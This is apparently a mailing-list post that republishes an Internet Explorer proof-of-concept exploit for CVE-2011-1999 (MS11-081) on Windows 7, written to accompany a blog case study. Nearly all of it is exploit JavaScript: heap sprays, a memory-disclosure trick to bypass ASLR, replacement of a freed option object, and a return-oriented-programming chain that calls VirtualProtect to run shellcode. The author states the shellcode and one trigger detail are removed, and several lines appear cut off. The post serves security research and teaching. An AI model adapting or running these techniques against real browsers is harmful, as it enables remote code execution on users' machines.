Reliable Windows 7 Exploitation: A Case Study

From: Ivan Fratric <>
Subject: Reliable Windows 7 Exploitation: A Case Study

Below is the PoC code for CVE-2011-1999 (MS11-081) that accompanies my
blog article
"Reliable Windows 7 Exploitation: A Case Study"

Some notes about the PoC code:
 - The exploit uses a single vulnerability to both bypass ASLR and
execute the payload without requiring any non-ASLR module in memory.
 - One tiny detail required for triggering the vulnerability has been
removed, so the exploit (as given below) should not work, even on
vulnerable systems. No, I won't tell you what it is. Sorry kids, this
is for educational purposes only.
 - All offsets in the code were correct for mshtml.dll at the time
this exploit code was written. As some time has passed between then
and the time the vulnerability was patched, they won't be correct for
many vulnerable versions of this module. Writing the exploit that
doesn't rely on any hardcoded offsets is left as an exercise for the
reader (more difficult, but certainly possible with the combination of
the techniques used in the PoC below).



<script type="text/javascript">

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();

var optarray;

var mshtmlbase;

//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;

function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);

function inttostr(num) {
      return String.fromCharCode(num%65536,Math.floor(num/65536));

function crash() {
     var o = new Option();

function readmem(addr) {
   if(addr < readaddr) alert("Error, can't read that address");
   return strtoint(spray[readindex].substr((addr-readaddr)/2,2));

function readmem2(addr,size) {
       if(addr < readaddr) alert("Error, can't read that address");
   return spray[readindex].substr((addr-readaddr)/2,size/2);

function overwrite(addr) {
        try {
              var index = (addr-optarryaddr)/4 - 0x40000000;
    } catch(err) {} 

function getreadaddr() {
   readaddr = 0;
      var indexarray = new Array();
      var tmpaddr = 0;
   var i,index;
   index = readmem(tmpaddr);
   while(1) {
         tmpaddr += 0x100000;
               index = readmem(tmpaddr);
          for(i=0;i<indexarray.length;i++) {
                    if(indexarray[i]==index+1) {
                               readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
                          return 1;
                  } else if(indexarray[i]==index-1) {
                                readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
                          return 1;                               

//leverages the vulnerability into memory disclosure
function initread() {
    //overwrite something in a heap spray slide
        try {
     } catch(err) {}
   //now find what and where exectly did we overwrite
 readindex = -1;
    var i;
     for(i=1;i<200;i++) {
                 readindex = i;

     if(readindex == -1) {
              alert("Error overwriring first spray");
          return 0;

     var start=2,len=spray[readindex].length-2,mid;
     while(len>10) {
               mid = Math.round(len/2);
           mid = mid - mid%2;
         if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
                       len = mid;
         } else {
                   start = start+mid;
                 len = len-mid;
                     //if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
   for(i=start;i<(start+20);i=i+2) {
             if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
   //overwrite the string length
      try {
       } catch(err) {}
   if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");
   //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
   optarryaddr = readaddr + 100000000 + i*2;

     return 1;       

function trysploit() {
     //create some helper objects
       for(var i =0; i < 100; i++) {

     //force the option cache to rebuild itself
 var tmp1 = selarray[99].options[70].text;

     //overwrite the CTreeNode pointer
    //read the address of the option object we overwrited with
 var optadr = readmem(corruptaddr);
 //delete the option object...
   //...and allocate some strings in its place
        for(var i = 0; i < elms.length; i++) {
                elms[i].className = fakeobj;

     //verify we overwrote the deleted option object successfully
       if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;

        alert("success, calc.exe should start once you close this message box");

    //now do something with the corrupted option object;

function hs() {
   //first heap spray, nop slide + shellcode       
   spray = new Array(200);
    var pattern = unescape("%u0C0C%u0C0C");
  while(pattern.length<(0x100000/2)) pattern+=pattern;
  pattern = pattern.substr(0,0x100000/2-0x100);
      for(var i=0;i<200;i++) {
              spray[i] = [inttostr(i)+pattern+scode].join("");

     //fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
    var asmall = new Array(10000);
     pattern = "aaaa";
        while(pattern.length<500) pattern+=pattern;
   for(var i=0;i<10000;i++) {
   //create some select and option elements
   selarray = new Array(100);
 for(var i=0;i<100;i++) {
              selarray[i] = document.createElement("select");
          for(var j=0;j<100;j++) {
                      var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
   //create some extra option elements
        optarray = new Array(10000);
       for(var i=0;i<10000;i++) {
            optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
   //enable memory disclosure
 if(initread()==0) return;

     //force the option cache to rebuild itself
 var tmp1 = selarray[99].options[60].text;
   //get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
 corruptedoptionaddr = readmem(optarryaddr+60*4);
   corruptedoption = selarray[99].options[60];
   //get the base address of mshtml.dll based on the vtable address
inside the option object
      mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
 alert("base address of mshtml.dll : " + mshtmlbase.toString(16));

   //we'll overwrite the pointer to the CTreeNode object, compute its address
    corruptaddr = corruptedoptionaddr+0x14;

       //second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
 spray2 = new Array(200);        

      //some address that is likely to be inside the "stack"
   newstackaddr = optarryaddr+100000000;

   //assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
      newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
     newstack = newstack.substr(0,0x1000/2);
    while(newstack.length<(0x100000/2)) newstack+=newstack;
       newstack = newstack.substr(0,0x100000/2-0x100);
    for(var i=0;i<200;i++) {
              spray2[i] = [newstack].join("");
   //constract a fake object which will replace a deleted option object
(it has to be the same size)
      //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
  fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
   //loop until we either achieve command execution or fail
   for(var i=0;i<100;i++) {
   alert("Exploit failed, try again");





Copyright © 1995-2020 All rights reserved.